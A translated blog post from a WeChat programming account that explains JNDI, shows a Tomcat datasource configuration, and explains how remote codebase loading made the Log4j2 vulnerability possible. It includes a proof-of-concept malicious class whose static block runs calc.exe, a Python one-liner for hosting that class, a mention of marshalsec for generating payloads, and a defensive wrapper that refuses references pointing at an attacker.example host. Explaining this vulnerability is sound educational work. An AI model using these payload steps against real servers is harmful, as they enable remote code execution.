Original: Taste of Little Sister (WeChat official account ID: XjjDog). Feel free to share, but please keep the source attribution.

JNDI seems to be involved in every big vulnerability. The recent Log4j2 vulnerability is related to it too, which makes people wonder whether the author left a back door.

JNDI is something many people have never even heard of, let alone used. Why put such an exotic feature into a logging framework? Probably only the author knows.

Database driver

Many people first meet JNDI when configuring a database driver. Of course, with the popularity of SpringBoot's single-jar deployment, fewer and fewer old-fashioned companies still use this method to obtain the database configuration.

For example, we can configure a Resource in Tomcat's server.xml file:

<Resource name="jdbc/xjjdogDB" auth="Container" type="javax.sql.DataSource"
          maxTotal="100" maxIdle="30" maxWaitMillis="10000"
          username="xjjdog" password="123456" driverClassName="com.mysql.jdbc.Driver"
          url="jdbc:mysql://localhost:3306/xjjdog_db"/>

Then we only need to configure the JNDI name in SpringBoot and it will load the correct configuration. The premise is that the SpringBoot service is packaged as a WAR for deployment. Software like JBoss, which calls itself an enterprise server, likes to do exactly that.

spring:
  datasource:
    jndi-name: jdbc/xjjdogDB

From this we can see what JNDI actually is. You can think of it either as a configuration center or as a naming service. Its basic function is that from a short string you can retrieve a complex, fully initialized configuration object.

This way, we avoid writing these configurations directly into the project. What gets loaded when the program starts depends on what is configured in the running environment.

It is essentially a HashMap that retrieves a value by key.

This is where the danger comes in

The point is that this value is not a String but an Object. To go from a string to an arbitrary class, and to do so generically, you have to rely on reflection.

The diagram above is Oracle's official introduction to JNDI. The upper layers are not the point; what matters is that JNDI can interact with LDAP, RMI and other technologies through the SPI mechanism.

Any convenience that bends the rules for the sake of convenience creates problems. SPI is one of the few technologies that breaks the normal Java class-loading mechanism; like the Unsafe class, it is powerful but not recommended.

The screenshot above is the getObjectFactoryFromReference method of NamingManager. It first tries to load the factory class locally; if that fails, it does something it should not do but is designed to do: it fetches the class from a codebase URL on the network and constructs the object from that code!
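As an added example (not code from the original post), here is a defensive wrapper around the resolution step just described: it inspects a javax.naming.Reference before handing it to NamingManager and refuses any reference that carries a remote codebase, which is exactly the branch getObjectFactoryFromReference would otherwise follow. It also checks the two JDK properties that gate codebase downloads for RMI and LDAP. The host in the sample reference is a placeholder.

```java
import java.util.Hashtable;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.spi.NamingManager;

public class SafeReferenceResolver {

    // Resolve a JNDI Reference only if it can be satisfied from local classes.
    public static Object resolve(Reference ref) throws Exception {
        // A non-null factory location is the codebase URL that
        // getObjectFactoryFromReference would download from. Refuse it outright.
        if (ref.getFactoryClassLocation() != null) {
            throw new NamingException("reference carries remote codebase "
                    + ref.getFactoryClassLocation() + "; refusing to resolve");
        }
        String factory = ref.getFactoryClassName();
        if (factory != null) {
            // Fail closed: the factory must already be on the classpath.
            // (initialize=false so no static initializer runs during the check)
            Class.forName(factory, false, Thread.currentThread().getContextClassLoader());
        }
        return NamingManager.getObjectInstance(ref, null, null, new Hashtable<>());
    }

    // Both properties default to false on current JDKs; a hardening check
    // should confirm nobody has turned them back on.
    public static boolean codebaseTrustDisabled() {
        return !Boolean.getBoolean("com.sun.jndi.rmi.object.trustURLCodebase")
            && !Boolean.getBoolean("com.sun.jndi.ldap.object.trustURLCodebase");
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a reference whose factory lives on a remote host
        // (placeholder host name), the shape an attacker-controlled LDAP entry yields.
        Reference remote = new Reference("a", "a", "http://attacker.example:8000/");
        try {
            resolve(remote);
        } catch (NamingException e) {
            System.out.println("blocked: " + e.getMessage());
        }
        System.out.println("codebase trust disabled: " + codebaseTrustDisabled());
    }
}
```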

This leaves plenty of room for mischief. As shown above, all we need is an nginx listening on port 8000, or a small web server started with Python.

python -m http.server 8000

A server that can make outbound requests will automatically load the malicious class file from the specified host.

Creating these offensive payloads is also very easy; tools like marshalsec generate them readily.

According to Java's class-loading mechanism, a static initializer block can contain arbitrary code that runs as soon as the class is loaded. We just put the compiled a.class in place and the JNDI machinery loads it.

public class a {
    // The static initializer runs the moment the class is loaded,
    // so no method of the class ever needs to be called.
    static {
        try {
            String[] cmd = {"calc.exe"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

The code above starts the calc calculator on the server where it is deployed. Of course, it could do much more.

END

As shown above, Java reflection is powerful but also dangerous. The SPI feature inherits this trait and boldly exposes its weak points. I think the functionality is great, but why should it exist in a logging framework?

It's probably because of the feature arms race. After all, a logging framework should also have the dream of a metaverse!

Xjjdog is a public account that keeps programmers from getting sidetracked. It focuses on infrastructure and Linux. Ten years of architecture and tens of billions of daily requests: let's discuss the world of high concurrency and give you a different taste. My personal WeChat is xjjdog0; feel free to add me for further discussion.